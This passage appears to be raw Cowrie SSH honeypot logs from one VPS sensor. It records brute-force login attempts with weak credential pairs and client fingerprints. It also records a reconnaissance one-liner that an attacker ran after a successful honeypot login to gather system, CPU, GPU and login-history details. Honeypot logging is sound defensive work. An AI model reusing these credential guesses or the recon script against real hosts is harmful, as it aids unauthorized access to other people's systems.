aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T12:00:59.758831Z","src_ip":"196.251.86.249","session":"f38066fe43df"}
{"eventid":"cowrie.login.failed","username":"git","password":"wasd","message":"login attempt [git/wasd] failed","sensor":"my-vps","timestamp":"2025-08-26T12:01:01.515900Z","src_ip":"196.251.86.249","session":"f38066fe43df"}
{"eventid":"cowrie.session.closed","duration":"6.6","message":"Connection lost after 6.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:01:03.963675Z","src_ip":"196.251.86.249","session":"f38066fe43df"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":57746,"dst_ip":"1.2.3.4","dst_port":22,"session":"5cc430cdf8fc","protocol":"ssh","message":"New connection: 83.168.105.65:57746 (1.2.3.4:22) [session: 5cc430cdf8fc]","sensor":"my-vps","timestamp":"2025-08-26T12:01:11.621385Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:01:11.622909Z","src_ip":"83.168.105.65","session":"5cc430cdf8fc"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:01:11.659323Z","src_ip":"83.168.105.65","session":"5cc430cdf8fc"}
{"eventid":"cowrie.login.failed","username":"flink","password":"flink123","message":"login attempt [flink/flink123] failed","sensor":"my-vps","timestamp":"2025-08-26T12:01:11.815082Z","src_ip":"83.168.105.65","session":"5cc430cdf8fc"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:01:12.854644Z","src_ip":"83.168.105.65","session":"5cc430cdf8fc"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.112","src_port":61396,"dst_ip":"1.2.3.4","dst_port":22,"session":"f6e243ff1d32","protocol":"ssh","message":"New connection: 80.94.95.112:61396 (1.2.3.4:22) [session: f6e243ff1d32]","sensor":"my-vps","timestamp":"2025-08-26T12:01:14.067262Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T12:01:14.068283Z","src_ip":"80.94.95.112","session":"f6e243ff1d32"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T12:01:14.098655Z","src_ip":"80.94.95.112","session":"f6e243ff1d32"}
{"eventid":"cowrie.login.failed","username":"admin","password":"Russian7","message":"login attempt [admin/Russian7] failed","sensor":"my-vps","timestamp":"2025-08-26T12:01:14.303787Z","src_ip":"80.94.95.112","session":"f6e243ff1d32"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58092,"dst_ip":"1.2.3.4","dst_port":22,"session":"8580598baf9f","protocol":"ssh","message":"New connection: 212.227.235.229:58092 (1.2.3.4:22) [session: 8580598baf9f]","sensor":"my-vps","timestamp":"2025-08-26T12:01:14.890655Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:01:15.313751Z","src_ip":"212.227.235.229","session":"8580598baf9f"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T12:01:15.314404Z","src_ip":"212.227.235.229","session":"8580598baf9f"}
{"eventid":"cowrie.login.failed","username":"admin","password":"rsalinas","message":"login attempt [admin/rsalinas] failed","sensor":"my-vps","timestamp":"2025-08-26T12:01:15.338264Z","src_ip":"80.94.95.112","session":"f6e243ff1d32"}
{"eventid":"cowrie.login.failed","username":"admin","password":"roserose","message":"login attempt [admin/roserose] failed","sensor":"my-vps","timestamp":"2025-08-26T12:01:16.370034Z","src_ip":"80.94.95.112","session":"f6e243ff1d32"}
{"eventid":"cowrie.login.success","username":"root","password":"1234","message":"login attempt [root/1234] succeeded","sensor":"my-vps","timestamp":"2025-08-26T12:01:17.047249Z","src_ip":"212.227.235.229","session":"8580598baf9f"}
{"eventid":"cowrie.login.failed","username":"admin","password":"rosco","message":"login attempt [admin/rosco] failed","sensor":"my-vps","timestamp":"2025-08-26T12:01:17.402648Z","src_ip":"80.94.95.112","session":"f6e243ff1d32"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T12:01:18.137989Z","src_ip":"212.227.235.229","session":"8580598baf9f"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-26T12:01:18.138895Z","src_ip":"212.227.235.229","session":"8580598baf9f"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T12:01:18.139655Z","src_ip":"212.227.235.229","session":"8580598baf9f"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T12:01:18.140795Z","src_ip":"212.227.235.229","session":"8580598baf9f"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-26T12:01:18.142626Z","src_ip":"212.227.235.229","session":"8580598baf9f"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T12:01:18.143782Z","src_ip":"212.227.235.229","session":"8580598baf9f"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T12:01:18.144834Z","src_ip":"212.227.235.229","session":"8580598baf9f"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-26T12:01:18.146526Z","src_ip":"212.227.235.229","session":"8580598baf9f"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-26T12:01:18.147996Z","src_ip":"212.227.235.229","session":"8580598baf9f"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T12:01:18.149019Z","src_ip":"212.227.235.229","session":"8580598baf9f"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T12:01:18.149594Z","src_ip":"212.227.235.229","session":"8580598baf9f"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T12:01:18.150584Z","src_ip":"212.227.235.229","session":"8580598baf9f"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T12:01:18.151403Z","src_ip":"212.227.235.229","session":"8580598baf9f"}
{"eventid":"cowrie.login.failed","username":"admin","password":"rootedit","message":"login attempt [admin/rootedit] failed","sensor":"my-vps","timestamp":"2025-08-26T12:01:18.434775Z","src_ip":"80.94.95.112","session":"f6e243ff1d32"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-26T12:01:18.577916Z","src_ip":"212.227.235.229","session":"8580598baf9f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:01:18.579433Z","src_ip":"212.227.235.229","session":"8580598baf9f"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:01:18.581464Z","src_ip":"212.227.235.229","session":"8580598baf9f"}
{"eventid":"cowrie.session.closed","duration":"5.4","message":"Connection lost after 5.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:01:19.468250Z","src_ip":"80.94.95.112","session":"f6e243ff1d32"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":35720,"dst_ip":"1.2.3.4","dst_port":22,"session":"981b8461e41d","protocol":"ssh","message":"New connection: 83.168.105.65:35720 (1.2.3.4:22) [session: 981b8461e41d]","sensor":"my-vps","timestamp":"2025-08-26T12:01:27.028941Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:01:27.029979Z","src_ip":"83.168.105.65","session":"981b8461e41d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:01:27.070320Z","src_ip":"83.168.105.65","session":"981b8461e41d"}
{"eventid":"cowrie.login.failed","username":"gitlab-runner","password":"gitlab-runner","message":"login attempt [gitlab-runner/gitlab-runner] failed","sensor":"my-vps","timestamp":"2025-08-26T12:01:27.195183Z","src_ip":"83.168.105.65","session":"981b8461e41d"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:01:28.237705Z","src_ip":"83.168.105.65","session":"981b8461e41d"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":40980,"dst_ip":"1.2.3.4","dst_port":22,"session":"f5296315a2eb","protocol":"ssh","message":"New connection: 83.168.105.65:40980 (1.2.3.4:22) [session: f5296315a2eb]","sensor":"my-vps","timestamp":"2025-08-26T12:01:42.386299Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:01:42.387285Z","src_ip":"83.168.105.65","session":"f5296315a2eb"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:01:42.424375Z","src_ip":"83.168.105.65","session":"f5296315a2eb"}
{"eventid":"cowrie.login.failed","username":"es","password":"es123456","message":"login attempt [es/es123456] failed","sensor":"my-vps","timestamp":"2025-08-26T12:01:42.537661Z","src_ip":"83.168.105.65","session":"f5296315a2eb"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:01:43.577577Z","src_ip":"83.168.105.65","session":"f5296315a2eb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49732,"dst_ip":"1.2.3.4","dst_port":22,"session":"ec3f117a574e","protocol":"ssh","message":"New connection: 212.227.235.229:49732 (1.2.3.4:22) [session: ec3f117a574e]","sensor":"my-vps","timestamp":"2025-08-26T12:01:49.542329Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:01:49.677439Z","src_ip":"212.227.235.229","session":"ec3f117a574e"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T12:01:49.678107Z","src_ip":"212.227.235.229","session":"ec3f117a574e"}
{"eventid":"cowrie.login.success","username":"root","password":"123","message":"login attempt [root/123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T12:01:50.691798Z","src_ip":"212.227.235.229","session":"ec3f117a574e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T12:01:51.533187Z","src_ip":"212.227.235.229","session":"ec3f117a574e"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; 